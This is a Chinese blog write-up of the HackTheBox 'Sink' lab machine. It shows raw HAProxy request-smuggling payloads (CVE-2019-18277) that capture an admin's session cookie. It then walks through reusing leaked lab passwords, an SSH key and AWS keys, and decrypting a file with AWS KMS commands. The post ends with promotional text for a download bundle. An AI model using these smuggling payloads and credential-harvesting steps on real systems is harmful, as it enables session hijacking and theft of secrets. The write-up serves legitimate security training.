它来了 靶机渗透题目的一次实战记录

0x00 题目介绍

Sink是HackTheBox上一道难度是insaneLinux靶机,做了很久HackTheBox,第一次做insane难度的,还是学到了很多东西的,在这里跟大家分享一下。

####

题目主要涉及到的知识点是:

HAProxy HTTP request smuggling (CVE-2019-18277) Git commit log AWS CLI Configure

0x01 Port Scan

└─# nmap -sC -sV -oA sink 10.129.71.3
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 00:00 CST
Nmap scan report for 10.129.71.3
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
3000/tcp openppp?
| fingerprint-strings: 
| GenericLines, Help: 
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest: 
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=7d01b54d4b74326b; Path=/; HttpOnly
| Set-Cookie: _csrf=fzBuPyYXciKNMjoU74_PH6UmsMU6MTYyNTUwMDg1NzUxOTkyOTA4OQ; Path=/; Expires=Tue, 06 Jul 2021 16:00:57 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 05 Jul 2021 16:00:57 GMT
| HTTPOptions: 
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=5a24776cc4ce15ce; Path=/; HttpOnly
| Set-Cookie: _csrf=Naj5fDxJz0wmhymfl7zrTjDvfrI6MTYyNTUwMDg2NDgyNDg1NDY3MQ; Path=/; Expires=Tue, 06 Jul 2021 16:01:04 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 05 Jul 2021 16:01:04 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
|_<meta name="description" content="Gitea (Git with a c
5000/tcp openhttpGunicorn 20.0.0
|_http-server-header: gunicorn/20.0.0
|_http-title: Sink Devops 

开放的主要是3000和5000端口,3000端口为Gitea的网站,5000端口为Gunicorn的网站。3000端口的网站需要登录,但是我们没有掌握任何登录凭证,所以先看下5000端口网站。

0x02 Port 5000 – Gunicorn

5000端口网站可以注册账户,先尝试注册用户登录抓包看下

看到抓包中response包含了haproxygunicorn

登录后页面可以发布评论。Google了下发现存在一个HAProxy HTTP request smuggling (CVE-2019-18277)的漏洞,通过HTTP请求走私发送构造的特定的评论请求,可以获取到其他用户发送的HTTP请求中的隐私信息。

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/8b548e906ff84cb29af923a212f4c498~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://p5.ssl.qhimg.com/t01d60faffdbd8b134e.png"" style="margin: auto" />

HAProxy HTTP request smuggling (CVE-2019-18277)

HAProxy在处理request header中的Transfer-EncodingContent-Length时存在问题,如果在请求头中同时添加了Transfer-EncodingContent-Length,并且在Transfer-Encodingchunked字段前添加了\x0b或者\x0c时,HAProxy会错误的将带有Transfer-EncodingContent-Length的请求发送给后端处理。此时因为后端将请求作为Transfer-Encoding格式的请求解析,即会在检测到类似0\r\n\r\n之后结束当前请求。

发送给HAProxy的请求:

POST / HTTP/1.1
Host: 127.0.0.1:1080
Content-Length: 6
Transfer-Encoding:[\x0b]chunked
​
0
​
X 

发送给后端处理的请求:

POST / HTTP/1.1
Host: 127.0.0.1:1080
Content-Length: 6
Transfer-Encoding:chunked
X-Forwarded-For: 172.21.0.1
​
0
​
X 

当然利用的前提是必须要在HAProxy配置中配置http-reuse always,并在发送请求时在header中配置Connection: keep-alive

admin cookie steal

利用上面的HAProxy HTTP request smuggling的漏洞,如果我们在构造的恶意请求之后,其他用户也进行了请求,那我们就可以通过走私一个恶意请求,将其他用户的请求的信息拼接到走私请求之后,并存储到网站中,我们再查看这些数据,就能获取用户的请求中的隐私信息了。

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/6af898cc40a04287b66961f3664744da~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://p1.ssl.qhimg.com/t01d2a73c34df54a654.png"" style="margin: auto" />

我们在repeater中构造一下请求

POST /comment HTTP/1.1
Host: 10.129.71.3:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://10.129.71.3:5000
Connection: keep-alive
Referer: http://10.129.71.3:5000/home
Cookie: lang=en-US; i_like_gitea=ec51054dc539d89a; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YO2r8w.8rq5TXqG7LkEYJV3cqVwOBTIh7o; _csrf=cQKWFLPhRfTeyypUg38t8RbxoUY6MTYyNjE4ODM1OTEzNDc4OTczMw
Upgrade-Insecure-Requests: 1
Transfer-Encoding: Cwo=chunked
​
5
msg=test
0
​
POST /comment HTTP/1.1
Host: 10.129.71.3:5000
Cookie: lang=en-US; i_like_gitea=ec51054dc539d89a; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YO2r8w.8rq5TXqG7LkEYJV3cqVwOBTIh7o; _csrf=cQKWFLPhRfTeyypUg38t8RbxoUY6MTYyNjE4ODM1OTEzNDc4OTczMw
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Connection: keep-alive
​
msg= 

后面这部分POST请求即为我们走私的请求,因为需要在Transfer-Encodingchunked前面加\x0b,我们先添加Cwo=,然后在burpshift+ctrl+b (base64 decode)即可,或者直接在burp中添加[\x0b]也可以。发送后我们在评论处可以看到一条新的评论,包含了这个用户的cookie。

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/970d364d90324656a63d2a588d22fb52~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://p5.ssl.qhimg.com/t016cc77e69d8edfa82.png"" style="margin: auto" />

Cookie editor替换一下,即可以获得[admin@sink.htb](mailto:admin@sink.htb)的权限。

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/7ba2d384c68b4d48b74b76eb5f8ed6fc~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://p1.ssl.qhimg.com/t010f231b3c1defc408.png"" style="margin: auto" />

Credentials

Notes中可以获得三部分Credentials:

Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz
​
Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3
​
Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C 

0x03 Port 3000 – Gitea

经过尝试,发现使用root/FaH[@3L](https://github.com/3L "@3L")>Z3})zzfQ3这个密码可以成功登录3000端口的Gitea

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/204842f2567d4db0968c3bf5eb1085dc~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://p3.ssl.qhimg.com/t016b345523c185bdce.png"" style="margin: auto" />

Gitea是一个类似git的代码托管平台,在几个主要的Repositories里看了下,发现key management中似乎有一些秘钥信息

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/0a4b6c223b0b4e6f91923c33d0062183~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://p4.ssl.qhimg.com/t0158fb5234f8e285bf.png"" style="margin: auto" />

发现是用户marcus提交的ssh私钥

User -marcus

将私钥拷到本地,并修改权限为600,ssh尝试连接marcus用户成功

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/d1148bcab0344ec38b4e7623e8dfd63c~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://p1.ssl.qhimg.com/t01edad8d708bfaa817.png"" style="margin: auto" />

ls当前目录发现user.txt,获得第一个flag

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/5adcaee1b45345a29ea158992ad0bc1c~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://p4.ssl.qhimg.com/t0160b00bbd58c59f81.png"" style="margin: auto" />

0x04 Privilege Escalation

根据Key Management可以发现,存在一些AWS的操作;同样在Log Management中,发现了marcus删除AWS相关配置的keysecret的提交记录

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/eabd1a35c4774ef3a12866370c0b3398~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://p4.ssl.qhimg.com/t01d4e7df2711d8c578.png"" style="margin: auto" />

顺着可以找到之前提交的配置的相关代码

<?php
require 'vendor/autoload.php';
​
use Aws\CloudWatchLogs\CloudWatchLogsClient;
use Aws\Exception\AwsException;
​
$client = new CloudWatchLogsClient(['region' => 'eu','endpoint' => 'http://127.0.0.1:4566','credentials' => ['key' => 'AKIAIUEN3QWCPSTEITJQ','secret' => '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'],'version' => 'latest'
]);
try {
$client->createLogGroup(array('logGroupName' => 'Chef_Events',
));
}
catch (AwsException $e) {echo $e->getMessage();echo "\n";
}
try {
$client->createLogStream(['logGroupName' => 'Chef_Events','logStreamName' => '20201120'
]);
}catch (AwsException $e) {echo $e->getMessage();echo "\n";
}
?> 

AWS CLI Configure

Google了一下AWS、key、secret,发现在官方指导手册中有相关介绍,可以通过AWS配置keysecret,从而访问关键隐私信息。官方指导手册如下:

docs.aws.amazon.com/cli/latest/…

docs.aws.amazon.com/cli/latest/…

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/ef9cfdb51ea1415390b7272a563ab2f3~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://p4.ssl.qhimg.com/t0140c0257d5b1051f2.png"" style="margin: auto" />

我们也尝试按照官方说明配置下,只需要修改keysecret即可,region代表所在区域,直接按照官方默认来设置:

marcus@sink:~$ aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: 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
Default region name [None]: us-west-2
Default output format [None]: json 

AWS Secretsmanager

配置完成之后可以通过secretsmanager列举保存的secrets

aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager list-secrets 

然后根据列举出的secrets逐个查询

aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:xxxxxxx<name>" 

获得了以下内容

username:david@sink.htb password:EALB=bcC=`a7f2#k
username:albert@sink.htbpassword:Welcome123!
username:john@sink.htbpassword:R);\\)ShS99mZ~8j 

User-david

查看/etc/passwd/home路径,发现是存在david用户的,尝试了下可以成功用密码切换到david用户

0x05 AWS Key Management

severs.enc

david用户目录下/home/david/Projects/Prod_Deployment发现了一个servers.enc文件,显然需要解密

因为目录是Gitea项目相关的目录,猜测很可能还是需要通过AWS来解密,搜索之后发现了AWS Key Management

docs.aws.amazon.com/kms/latest/…

docs.aws.amazon.com/kms/latest/…

list-keys

同样使用david用户先按照之前的AWS进行配置,配置之后可以list-keys

aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys 

decrypt

按照国外大神的思路进行解密操作,bash脚本如下:

#!/binbash
for KEY in $(aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys | grep KeyId | awk -F\" '{ print $4 }')
do aws --endpoint-url="http://127.0.0.1:4566/" kms enable-key --key-id "${KEY}"aws --endpoint-url="http://127.0.0.1:4566/" kms decrypt --key-id "${KEY}" --ciphertext-blob "fileb:///home/david/Projects/Prod_Deployment/servers.enc" --encryption-algorithm "RSAES_OAEP_SHA_256" --output "text" --query "Plaintext"
done 

得到了一串base64的字符串,推荐使用CyberChef进行解密,选取自己想要的模块直接拖就行,非常方便:

gchq.github.io/CyberChef/

base64之后需要再gunzip解下包,可以得到最后的秘钥:

name: admin
pass: _uezduQ!EY5AHfe2 

done!

总结

总的来看,这个靶机主要涉及到了HTTP请求走私、HAProxy HTTP request smuggling (CVE-2019-18277)Gitea信息泄露、AWS CLI配置、AWS Key Management等知识点,以前没搞过AWS的可以通过这个靶机好好熟悉下。另外HTTP请求走私虽然利用比较苛刻,但是也算是一个可以利用的攻击方法,需要后续在深入学习下。

学习计划安排

我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

①网络安全学习路线 ②上百份渗透测试电子书 ③安全攻防357页笔记 ④50份安全攻防面试指南 ⑤安全红队渗透工具包 ⑥HW护网行动经验总结 ⑦100个漏洞实战案例 ⑧安全大厂内部视频资源 ⑨历年CTF夺旗赛题解析

点击链接即可免费领取:网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值